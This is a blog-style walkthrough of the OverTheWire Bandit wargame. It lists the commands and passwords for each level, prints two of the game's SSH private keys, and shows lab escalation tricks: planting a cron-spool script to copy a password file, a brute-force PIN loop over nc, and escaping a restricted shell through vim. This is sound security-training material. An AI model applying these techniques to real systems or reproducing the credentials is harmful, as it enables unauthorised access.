overthewire bandit note

Posted on Edited on In Views: Disqus: Word count in article: 2.4k Reading time ≈ 9 mins.
overthewire bandit note all in one

overthewire

bandit level 0

1
bandit0@bandit:~$ cat readme
ZjLjTmM6FvvyRnrb2rfNWOZOTa6ip5If

bandit level 1

1
bandit1@bandit:~$ cat ./-
263JGJPfgU6LtdEvgfWU1XP5yac29mFx

bandit level 2

1
bandit2@bandit:~$ cat ./sp*
MNk8KNH3Usiio41PRUEoDFPqfxLPlSmx

bandit level 3

1
bandit3@bandit:~$ cat ./inhere/...H*
2WmrDFRmJIq3IPxneAaMGhap0pFhF3NJ

bandit level 4

1
bandit4@bandit:~$ file ./inhere/* | grep ASCII | cut -d ':' -f 1 | xargs cat
4oQYVPkxZOOEOO5pTW81FB8j8lxXGUQw

bandit level 5

1
bandit5@bandit:~$ find ./inhere/ -type f -size 1033c | xargs cat
HWasnPhtq9AVKe0dmk45nxy20cvUa6EG

bandit level 6

1
bandit6@bandit:~$ find / -type f -size 33c -user bandit7 -group bandit6 2> /dev/null | xargs cat
morbNTDkSW6jIlUc0ymOdMaLnOlFVAaj

bandit level 7

1
bandit7@bandit:~$ cat data.txt | grep millionth | awk '{print $2}'
dfwvzFQi4mU0wfNbFOe9RoWskMLg7eEc

bandit level 8

1
bandit8@bandit:~$ sort data.txt | uniq -u
4CKMh1JI91bUIZZPXDqGanal4xvAg0JM

bandit level 9

man grep File and Directory Selection -a, --text Process a binary file as if it were text; this is equivalent to the --binary-files=text option.

1
bandit9@bandit:~$ cat data.txt | grep -a === |strings | tail -n 1 |awk '{print $2}'
FGUW5ilLVJrxX9kMYMmlN4MgbpfMiqey

bandit level 10

1
bandit10@bandit:~$ cat data.txt | base64 -d | awk '{print $NF}'
dtR173fZKb0RRsDFSGsg2RWnpNVj3qRr

bandit level 11

Map each character of the first set to the corresponding character of the second set:

1
tr 'abcd' 'jkmn' < path/to/file

CHAR1-CHAR2 all characters from CHAR1 to CHAR2 in ascending order 

1
tr 'N-ZA-Mn-za-m' 'A-Za-z'

1
bandit11@bandit:~$ cat data.txt  | tr 'A-Za-z' 'N-ZA-Mn-za-m' | awk '{print $NF}'

or

use vim g? keymap

7x16WNeHIi5YkIhWsfFIqoognUTyj9Q4

bandit level 12

Revert a plaintext hexdump back into binary, and save it as a binary file:

1
xxd [-r|-revert] [-p|-postscript] input_file output_file
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
bandit12@bandit:~$ mktemp -d
/tmp/tmp.KykZXHYnaH

bandit12@bandit:~$ cp data.txt /tmp/tmp.KykZXHYnaH

bandit12@bandit:~$ cd /tmp/tmp.KykZXHYnaH

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ xxd -r data.txt > a.gz

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ gzip -d a.gz

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ file a
a: bzip2 compressed data, block size = 900k

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ bzip2 -d a
#bzip2: Can't guess original name for a -- using a.out

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ file a.out
a.out: gzip compressed data, was "data4.bin", last modified: Thu Apr 10 14:22:57 2025, max compression, from Unix, original size modulo 2^32 20480

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ gzip -d a.out
gzip: a.out: unknown suffix -- ignored

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ mv a.out a.gz

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ gzip -d a.gz

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ file a
a: POSIX tar archive (GNU)
bandit12@bandit:/tmp/tmp.KykZXHYnaH$ tar xf a

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ file data5.bin
data5.bin: POSIX tar archive (GNU)
bandit12@bandit:/tmp/tmp.KykZXHYnaH$ tar xf data5.bin

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ file data6.bin
data6.bin: bzip2 compressed data, block size = 900k

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ bzip2 -d data6.bin
#bzip2: Can't guess original name for data6.bin -- using data6.bin.out

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ file data6.bin.out
data6.bin.out: POSIX tar archive (GNU)

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ mv data6.bin.out a.tar

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ tar xf a.tar

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ file a
a: POSIX tar archive (GNU)

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ file data7.bin
#data7.bin: cannot open `data7.bin' (No such file or directory)

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ file data8.bin
data8.bin: gzip compressed data, was "data9.bin", last modified: Thu Apr 10 14:22:57 2025, max compression, from Unix, original size modulo 2^32 49

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ mv data8.bin d.gz

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ gzip -d d.gz

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ file d
d: ASCII text

bandit12@bandit:/tmp/tmp.KykZXHYnaH$ cat d
FO5dwFsc0cbaIiH0h8J2eUks2vdTDwAn

bandit level 13

1
bandit13@bandit:~$ cat sshkey.private
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAxkkOE83W2cOT7IWhFc9aPaaQmQDdgzuXCv+ppZHa++buSkN+
gg0tcr7Fw8NLGa5+Uzec2rEg0WmeevB13AIoYp0MZyETq46t+jk9puNwZwIt9XgB
ZufGtZEwWbFWw/vVLNwOXBe4UWStGRWzgPpEeSv5Tb1VjLZIBdGphTIK22Amz6Zb
ThMsiMnyJafEwJ/T8PQO3myS91vUHEuoOMAzoUID4kN0MEZ3+XahyK0HJVq68KsV
ObefXG1vvA3GAJ29kxJaqvRfgYnqZryWN7w3CHjNU4c/2Jkp+n8L0SnxaNA+WYA7
jiPyTF0is8uzMlYQ4l1Lzh/8/MpvhCQF8r22dwIDAQABAoIBAQC6dWBjhyEOzjeA
J3j/RWmap9M5zfJ/wb2bfidNpwbB8rsJ4sZIDZQ7XuIh4LfygoAQSS+bBw3RXvzE
pvJt3SmU8hIDuLsCjL1VnBY5pY7Bju8g8aR/3FyjyNAqx/TLfzlLYfOu7i9Jet67
xAh0tONG/u8FB5I3LAI2Vp6OviwvdWeC4nOxCthldpuPKNLA8rmMMVRTKQ+7T2VS
nXmwYckKUcUgzoVSpiNZaS0zUDypdpy2+tRH3MQa5kqN1YKjvF8RC47woOYCktsD
o3FFpGNFec9Taa3Msy+DfQQhHKZFKIL3bJDONtmrVvtYK40/yeU4aZ/HA2DQzwhe
ol1AfiEhAoGBAOnVjosBkm7sblK+n4IEwPxs8sOmhPnTDUy5WGrpSCrXOmsVIBUf
laL3ZGLx3xCIwtCnEucB9DvN2HZkupc/h6hTKUYLqXuyLD8njTrbRhLgbC9QrKrS
M1F2fSTxVqPtZDlDMwjNR04xHA/fKh8bXXyTMqOHNJTHHNhbh3McdURjAoGBANkU
1hqfnw7+aXncJ9bjysr1ZWbqOE5Nd8AFgfwaKuGTTVX2NsUQnCMWdOp+wFak40JH
PKWkJNdBG+ex0H9JNQsTK3X5PBMAS8AfX0GrKeuwKWA6erytVTqjOfLYcdp5+z9s
8DtVCxDuVsM+i4X8UqIGOlvGbtKEVokHPFXP1q/dAoGAcHg5YX7WEehCgCYTzpO+
xysX8ScM2qS6xuZ3MqUWAxUWkh7NGZvhe0sGy9iOdANzwKw7mUUFViaCMR/t54W1
GC83sOs3D7n5Mj8x3NdO8xFit7dT9a245TvaoYQ7KgmqpSg/ScKCw4c3eiLava+J
3btnJeSIU+8ZXq9XjPRpKwUCgYA7z6LiOQKxNeXH3qHXcnHok855maUj5fJNpPbY
iDkyZ8ySF8GlcFsky8Yw6fWCqfG3zDrohJ5l9JmEsBh7SadkwsZhvecQcS9t4vby
9/8X4jS0P8ibfcKS4nBP+dT81kkkg5Z5MohXBORA7VWx+ACohcDEkprsQ+w32xeD
qT1EvQKBgQDKm8ws2ByvSUVs9GjTilCajFqLJ0eVYzRPaY6f++Gv/UVfAPV4c+S0
kAWpXbv5tbkkzbS0eaLPTKgLzavXtQoTtKwrjpolHKIHUz6Wu+n4abfAIRFubOdN
/+aLoRQ0yBDRbdXMsZN/jvY44eM+xRLdRVyMmdPtP8belRi2E2aEzA==
-----END RSA PRIVATE KEY-----

bandit level 14

Connect to a remote server with a specific identity (private key):

1
ssh -i path/to/key_file username@remote_host
1
2
3
4
# Create a file named sshkey.private and paste the above private key into it
> vim sshkey.private

> ssh bandit14@bandit.labs.overthewire.org -p 2220 -i sshkey.private

get tips from level 13, the password for the next level is stored in /etc/bandit_pass/bandit14 and can only be read by user bandit14

1
bandit14@bandit:~$ cat /etc/bandit_pass/bandit14

this password is not the password for next level, it is the password port 30000

MU4VWeTyJk8ROof1qqmcBPaLh7lDCPvS

Connect to a target listener on the specified port:

1
nc host port
1
2
3
4
bandit14@bandit:~$ nc localhost 30000
#copy the password from above and paste it here
Correct!
#password to next level

or

1
cat /etc/bandit_pass/bandit14 | nc localhost 30000
8xCjnmgoKbGLhHFAZlGE5Tmu4M2tKJQo

bandit level 15

1
2
3
4
5
6
bandit15@bandit:~$ openssl s_client localhost:30001
# some info ... or use -quiet to suppress the output
# openssl s_client -connect localhost:30001 -quiet
8xCjnmgoKbGLhHFAZlGE5Tmu4M2tKJQo
Correct!
#password to next level
kSkvUpMQ7lBYyCM4GBPvCvT1BfWRy0Dx

another way to get the password is to use the command below

1
2
3
ncat --ssl localhost 30001
socat - OPENSSL:localhost:30001,verify=0
# use verify=0 to disable certificate verification

bandit level 16

Show all TCP sockets listening on the local 8080 port:

1
ss [-lt|--listening --tcp] src :8080
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
bandit16@bandit:~$ ss -lt | grep 31
LISTEN 0      4096         0.0.0.0:31518       0.0.0.0:*
LISTEN 0      4096         0.0.0.0:31790       0.0.0.0:*
LISTEN 0      64                 *:31691             *:*
LISTEN 0      64                 *:31046             *:*
LISTEN 0      4096               *:2231              *:*
LISTEN 0      64                 *:31960             *:*

bandit16@bandit:~$ ncat --ssl localhost 31790
kSkvUpMQ7lBYyCM4GBPvCvT1BfWRy0Dx
Correct!
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAvmOkuifmMg6HL2YPIOjon6iWfbp7c3jx34YkYWqUH57SUdyJ
imZzeyGC0gtZPGujUSxiJSWI/oTqexh+cAMTSMlOJf7+BrJObArnxd9Y7YT2bRPQ
Ja6Lzb558YW3FZl87ORiO+rW4LCDCNd2lUvLE/GL2GWyuKN0K5iCd5TbtJzEkQTu
DSt2mcNn4rhAL+JFr56o4T6z8WWAW18BR6yGrMq7Q/kALHYW3OekePQAzL0VUYbW
JGTi65CxbCnzc/w4+mqQyvmzpWtMAzJTzAzQxNbkR2MBGySxDLrjg0LWN6sK7wNX
x0YVztz/zbIkPjfkU1jHS+9EbVNj+D1XFOJuaQIDAQABAoIBABagpxpM1aoLWfvD
KHcj10nqcoBc4oE11aFYQwik7xfW+24pRNuDE6SFthOar69jp5RlLwD1NhPx3iBl
J9nOM8OJ0VToum43UOS8YxF8WwhXriYGnc1sskbwpXOUDc9uX4+UESzH22P29ovd
d8WErY0gPxun8pbJLmxkAtWNhpMvfe0050vk9TL5wqbu9AlbssgTcCXkMQnPw9nC
YNN6DDP2lbcBrvgT9YCNL6C+ZKufD52yOQ9qOkwFTEQpjtF4uNtJom+asvlpmS8A
vLY9r60wYSvmZhNqBUrj7lyCtXMIu1kkd4w7F77k+DjHoAXyxcUp1DGL51sOmama
+TOWWgECgYEA8JtPxP0GRJ+IQkX262jM3dEIkza8ky5moIwUqYdsx0NxHgRRhORT
8c8hAuRBb2G82so8vUHk/fur85OEfc9TncnCY2crpoqsghifKLxrLgtT+qDpfZnx
SatLdt8GfQ85yA7hnWWJ2MxF3NaeSDm75Lsm+tBbAiyc9P2jGRNtMSkCgYEAypHd
HCctNi/FwjulhttFx/rHYKhLidZDFYeiE/v45bN4yFm8x7R/b0iE7KaszX+Exdvt
SghaTdcG0Knyw1bpJVyusavPzpaJMjdJ6tcFhVAbAjm7enCIvGCSx+X3l5SiWg0A
R57hJglezIiVjv3aGwHwvlZvtszK6zV6oXFAu0ECgYAbjo46T4hyP5tJi93V5HDi
Ttiek7xRVxUl+iU7rWkGAXFpMLFteQEsRr7PJ/lemmEY5eTDAFMLy9FL2m9oQWCg
R8VdwSk8r9FGLS+9aKcV5PI/WEKlwgXinB3OhYimtiG2Cg5JCqIZFHxD6MjEGOiu
L8ktHMPvodBwNsSBULpG0QKBgBAplTfC1HOnWiMGOU3KPwYWt0O6CdTkmJOmL8Ni
blh9elyZ9FsGxsgtRBXRsqXuz7wtsQAgLHxbdLq/ZJQ7YfzOKU4ZxEnabvXnvWkU
YOdjHdSOoKvDQNWu6ucyLRAWFuISeXw9a/9p7ftpxm0TSgyvmfLF2MIAEwyzRqaM
77pBAoGAMmjmIJdjp+Ez8duyn3ieo36yrttF5NSsJLAbxFpdlc1gvtGCWW+9Cq0b
dxviW8+TFVEBl1O4f7HVm6EpTscdDxU+bCXWkfjuRb7Dy9GOtt9JPsX8MBTakzh3
vBgsyi/sN3RqRBcGU40fOoZyfAMT8s1m/uYv52O6IgeuZ/ujbjY=
-----END RSA PRIVATE KEY-----

bandit level 17

1
ssh bandit17@bandit.labs.overthewire.org -p 2220 -i sshkey.private
1
bandit17@bandit:~$ diff passwords.new passwords.old
x2gLTTjFwMOhQ8oWNbMN362QKxfRqGlO

bandit level 18

1
ssh bandit18@bandit.labs.overthewire.org -p 2220 -t cat ./readme

or 

1
ssh bandit18@bandit.labs.overthewire.org -p 2220 /bin/bash

cGWpMaKXVwDUNgPAVJbWYuGHVn9zl3j8

bandit level 19

1
bandit19@bandit:~$ ./bandit20-do cat /etc/bandit_pass/bandit20
0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO

bandit level 20

1
2
3
4
5
6
7
8
bandit20@bandit:~$ echo flaglevel20 | nc -l -p 7890 &
[1] 2043

bandit20@bandit:~$ ./suconnect 7890
Read: flaglevel20
Password matches, sending next password
flagtonextlevel
[1]+  Done                    echo flaglevel20 | nc -l -p 7890
EeoULMCra2q0dSkYj561DX7s1CpBuOBt

bandit level 21

1
2
3
4
5
6
7
8
9
10
11
12
13
14
bandit21@bandit:~$ ls /etc/cron.d/
clean_tmp         cronjob_bandit23  e2scrub_all  sysstat
cronjob_bandit22  cronjob_bandit24  otw-tmp-dir

bandit21@bandit:~$ cat /etc/cron.d/cronjob_bandit22
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null

bandit21@bandit:~$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv

bandit21@bandit:~$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
tRae0UfB9v0UzbCdn9cY0gQnds9GF58Q

bandit level 22

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
bandit22@bandit:~$ cat /etc/cron.d/cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null

bandit22@bandit:~$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash

myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"

cat /etc/bandit_pass/$myname > /tmp/$mytarget

echo I am user bandit23 | md5sum |cut -d ' ' -f 1
8ca319486bfbbc3663ea0fbe81326349

bandit22@bandit:~$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
0Zf11ioIjMVN551jX3CmStKLYqjk54Ga

bandit level 23

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname/foo
echo "Executing and deleting all scripts in /var/spool/$myname/foo:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -f ./$i
    fi
done

bandit23@bandit:~$ vim /var/spool/bandit24/foo/tmp.sh
#!/bin/bash

myname=bandit24
cat /etc/bandit_pass/$myname > /tmp/$myname.pass

bandit23@bandit:~$ chmod 777 /var/spool/bandit24/foo/tmp.sh

bandit23@bandit:~$ cat /tmp/bandit24.pass
gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8

bandit level 24

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
bandit24@bandit:/tmp/tmp.YfKCvV5CzF$ vim tmp.sh
#!/bin/bash
password="gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8"

for i in {1000..9999}; do
    echo "$password $i"
done | nc localhost 30002

bandit24@bandit:/tmp/tmp.YfKCvV5CzF$ ./tmp.sh
...
Wrong! Please enter the correct current password and pincode. Try again.
Wrong! Please enter the correct current password and pincode. Try again.
Wrong! Please enter the correct current password and pincode. Try again.
Correct!
The password of user bandit25 is
iCi86ttT4KSNe1armKiwbQNmB3YJP3q4

bandit level 25

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
bandit25@bandit:~$ cat bandit26.sshkey
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEApis2AuoooEqeYWamtwX2k5z9uU1Afl2F8VyXQqbv/LTrIwdW
pTfaeRHXzr0Y0a5Oe3GB/+W2+PReif+bPZlzTY1XFwpk+DiHk1kmL0moEW8HJuT9
/5XbnpjSzn0eEAfFax2OcopjrzVqdBJQerkj0puv3UXY07AskgkyD5XepwGAlJOG
xZsMq1oZqQ0W29aBtfykuGie2bxroRjuAPrYM4o3MMmtlNE5fC4G9Ihq0eq73MDi
1ze6d2jIGce873qxn308BA2qhRPJNEbnPev5gI+5tU+UxebW8KLbk0EhoXB953Ix
3lgOIrT9Y6skRjsMSFmC6WN/O7ovu8QzGqxdywIDAQABAoIBAAaXoETtVT9GtpHW
qLaKHgYtLEO1tOFOhInWyolyZgL4inuRRva3CIvVEWK6TcnDyIlNL4MfcerehwGi
il4fQFvLR7E6UFcopvhJiSJHIcvPQ9FfNFR3dYcNOQ/IFvE73bEqMwSISPwiel6w
e1DjF3C7jHaS1s9PJfWFN982aublL/yLbJP+ou3ifdljS7QzjWZA8NRiMwmBGPIh
Yq8weR3jIVQl3ndEYxO7Cr/wXXebZwlP6CPZb67rBy0jg+366mxQbDZIwZYEaUME
zY5izFclr/kKj4s7NTRkC76Yx+rTNP5+BX+JT+rgz5aoQq8ghMw43NYwxjXym/MX
c8X8g0ECgYEA1crBUAR1gSkM+5mGjjoFLJKrFP+IhUHFh25qGI4Dcxxh1f3M53le
wF1rkp5SJnHRFm9IW3gM1JoF0PQxI5aXHRGHphwPeKnsQ/xQBRWCeYpqTme9amJV
tD3aDHkpIhYxkNxqol5gDCAt6tdFSxqPaNfdfsfaAOXiKGrQESUjIBcCgYEAxvmI
2ROJsBXaiM4Iyg9hUpjZIn8TW2UlH76pojFG6/KBd1NcnW3fu0ZUU790wAu7QbbU
i7pieeqCqSYcZsmkhnOvbdx54A6NNCR2btc+si6pDOe1jdsGdXISDRHFb9QxjZCj
6xzWMNvb5n1yUb9w9nfN1PZzATfUsOV+Fy8CbG0CgYEAifkTLwfhqZyLk2huTSWm
pzB0ltWfDpj22MNqVzR3h3d+sHLeJVjPzIe9396rF8KGdNsWsGlWpnJMZKDjgZsz
JQBmMc6UMYRARVP1dIKANN4eY0FSHfEebHcqXLho0mXOUTXe37DWfZza5V9Oify3
JquBd8uUptW1Ue41H4t/ErsCgYEArc5FYtF1QXIlfcDz3oUGz16itUZpgzlb71nd
1cbTm8EupCwWR5I1j+IEQU+JTUQyI1nwWcnKwZI+5kBbKNJUu/mLsRyY/UXYxEZh
ibrNklm94373kV1US/0DlZUDcQba7jz9Yp/C3dT/RlwoIw5mP3UxQCizFspNKOSe
euPeaxUCgYEAntklXwBbokgdDup/u/3ms5Lb/bm22zDOCg2HrlWQCqKEkWkAO6R5
/Wwyqhp/wTl8VXjxWo+W+DmewGdPHGQQ5fFdqgpuQpGUq24YZS8m66v5ANBwd76t
IZdtF5HXs2S5CADTwniUS5mX1HO9l5gUkk+h0cH5JnPtsMCnAUM+BRY=
-----END RSA PRIVATE KEY-----

bandit25@bandit:~$ cat /etc/passwd | grep bandit26
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
bandit25@bandit:~$ cat /usr/bin/showtext
#!/bin/sh

export TERM=linux

exec more ~/text.txt
exit 0

taken from https://medium.com/@coturnix97/overthewires-bandit-25-26-shell-355d78fd2f4d

1
2
3
4
5
6
7
# small virtual terminal window
➤ ssh bandit26@bandit.labs.overthewire.org -p 2220 -i bandit26.sshkey

# press v :e /etc/bandit_pass/bandit26
# :set shell=/bin/bash
# :shell

s0773xxkk0MXfdqOfPRVr9L3jJBUOgCZ

bandit level 26

1
bandit26@bandit:~$ ./bandit27-do cat /etc/bandit_pass/bandit27
upsNCc7vzaRDx6oZC6GiR6ERwe1MowGB

bandit level 27

Dont forget to mktemp a directory to clone the git repository into, otherwise you will get fatal: could not create work tree dir 'repo': Permission denied

1
2
3
4
5
6
7
8
9
10
11
12
13
bandit27@bandit:~$ mktemp -d
/tmp/tmp.W54bwIQdTm

bandit27@bandit:~$ cd /tmp/tmp.W54bwIQdTm

bandit27@bandit:/tmp/tmp.W54bwIQdTm$ git clone ssh://bandit27-git@localhost:2220/home/bandit27-git/repo
...
bandit27-git@localhost's password:
...

bandit27@bandit:/tmp/tmp.W54bwIQdTm/repo$ cat README
The password to the next level is:

Yz9IpL0sBcCeuG7m9uQFt8ZNpS4HZRcN

bandit level 28

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
bandit28@bandit:~$ mktemp -d
/tmp/tmp.Dnue3slg2g
bandit28@bandit:~$ cd /tmp/tmp.Dnue3slg2g
bandit28@bandit:/tmp/tmp.Dnue3slg2g$ git clone ssh://bandit28-git@localhost:2220/home/bandit28-git/repo
Cloning into 'repo'...
The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can't be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Could not create directory '/home/bandit28/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/home/bandit28/.ssh/known_hosts).
                         _                     _ _ _
                        | |__   __ _ _ __   __| (_) |_
                        | '_ \ / _` | '_ \ / _` | | __|
                        | |_) | (_| | | | | (_| | | |_
                        |_.__/ \__,_|_| |_|\__,_|_|\__|


                      This is an OverTheWire game server.
            More information on http://www.overthewire.org/wargames

bandit28-git@localhost's password:
remote: Enumerating objects: 9, done.
remote: Counting objects: 100% (9/9), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 9 (delta 2), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (9/9), done.
Resolving deltas: 100% (2/2), done.

bandit28@bandit:/tmp/tmp.Dnue3slg2g/repo$ git log -p
commit 674690a00a0056ab96048f7317b9ec20c057c06b (HEAD -> master, origin/master, origin/HEAD)
Author: Morla Porla <morla@overthewire.org>
Date:   Thu Apr 10 14:23:19 2025 +0000

    fix info leak

diff --git a/README.md b/README.md
index d4e3b74..5c6457b 100644
--- a/README.md
+++ b/README.md
@@ -4,5 +4,5 @@ Some notes for level29 of bandit.
 ## credentials

 - username: bandit29
-- password: 4pT1t5DENaYuqnqvadYs1oE4QLCdjmJ7
+- password: xxxxxxxxxx
...
4pT1t5DENaYuqnqvadYs1oE4QLCdjmJ7

bandit level 29

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
bandit29@bandit:/tmp/tmp.uymj8B2LpI$ git clone ssh://bandit29-git@localhost:2220/home/bandit29-git/repo
Cloning into 'repo'...
The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can't be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Could not create directory '/home/bandit29/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/home/bandit29/.ssh/known_hosts).
                         _                     _ _ _
                        | |__   __ _ _ __   __| (_) |_
                        | '_ \ / _` | '_ \ / _` | | __|
                        | |_) | (_| | | | | (_| | | |_
                        |_.__/ \__,_|_| |_|\__,_|_|\__|


                      This is an OverTheWire game server.
            More information on http://www.overthewire.org/wargames

bandit29-git@localhost's password:
remote: Enumerating objects: 16, done.
remote: Counting objects: 100% (16/16), done.
remote: Compressing objects: 100% (11/11), done.
remote: Total 16 (delta 2), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (16/16), done.
Resolving deltas: 100% (2/2), done.

bandit29@bandit:/tmp/tmp.uymj8B2LpI/repo$ git branch -a
* master
  remotes/origin/HEAD -> origin/master
  remotes/origin/dev
  remotes/origin/master
  remotes/origin/sploits-dev

bandit29@bandit:/tmp/tmp.uymj8B2LpI/repo$ git log -p origin/dev
commit a97d0dbf8fd910ead6fcf648829ff55c1a629c8e (origin/dev)
Author: Morla Porla <morla@overthewire.org>
Date:   Thu Apr 10 14:23:21 2025 +0000

    add data needed for development

diff --git a/README.md b/README.md
index 1af21d3..bc6ad3d 100644
--- a/README.md
+++ b/README.md
@@ -4,5 +4,5 @@ Some notes for bandit30 of bandit.
 ## credentials

 - username: bandit30
-- password: <no passwords in production!>
+- password: qp30ex3VLz5MDG1n91YowTv4Q8l7CDZL
...
qp30ex3VLz5MDG1n91YowTv4Q8l7CDZL

bandit level 30

1
2
3
4
# same as above, but with bandit30-git
bandit30@bandit:/tmp/tmp.G0HYcVr8Od/repo$ git tag
secret
bandit30@bandit:/tmp/tmp.G0HYcVr8Od/repo$ git show secret
fb5S2xb7bRyFmAvQYQGEqsbhVyJqhnDy

bandit level 31

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
# same login and clone as above

bandit31@bandit:/tmp/tmp.blHsxtiTrN/repo$ cat README.md
This time your task is to push a file to the remote repository.

Details:
    File name: key.txt
    Content: 'May I come in?'
    Branch: master

# del the .gitignore file
bandit31@bandit:/tmp/tmp.blHsxtiTrN/repo$ vim .gitignore

# create the key.txt file and add the content
bandit31@bandit:/tmp/tmp.blHsxtiTrN/repo$ vim key.txt

bandit31@bandit:/tmp/tmp.blHsxtiTrN/repo$ git add .

bandit31@bandit:/tmp/tmp.blHsxtiTrN/repo$ git commit

bandit31@bandit:/tmp/tmp.blHsxtiTrN/repo$ git push
...
Writing objects: 100% (4/4), 326 bytes | 326.00 KiB/s, done.
Total 4 (delta 0), reused 0 (delta 0), pack-reused 0
remote: ### Attempting to validate files... ####
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
remote: Well done! Here is the password for the next level:
remote: 3O9RfhqyAlVBEZpVb6LYStshZoqoSx5K
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
To ssh://localhost:2220/home/bandit31-git/repo
 ! [remote rejected] master -> master (pre-receive hook declined)
error: failed to push some refs to 'ssh://localhost:2220/home/bandit31-git/repo'

3O9RfhqyAlVBEZpVb6LYStshZoqoSx5K

bandit level 32

taken from https://mayadevbe.me/posts/overthewire/bandit/level33/

1
2
3
4
>> $0
$ /bin/bash

bandit33@bandit:~$ cat /etc/bandit_pass/bandit33
tQdtbs5D5i2vJwkO8mEyYEyTL8izoeJ0

bandit level 33

1
2
3
4
5
6
7
8
9
bandit33@bandit:~$ cat README.txt
Congratulations on solving the last level of this game!

At this moment, there are no more levels to play in this game. However, we are constantly working
on new levels and will most likely expand this game with more levels soon.
Keep an eye out for an announcement on our usual communication channels!
In the meantime, you could play some of our other wargames.

If you have an idea for an awesome new level, please let us know!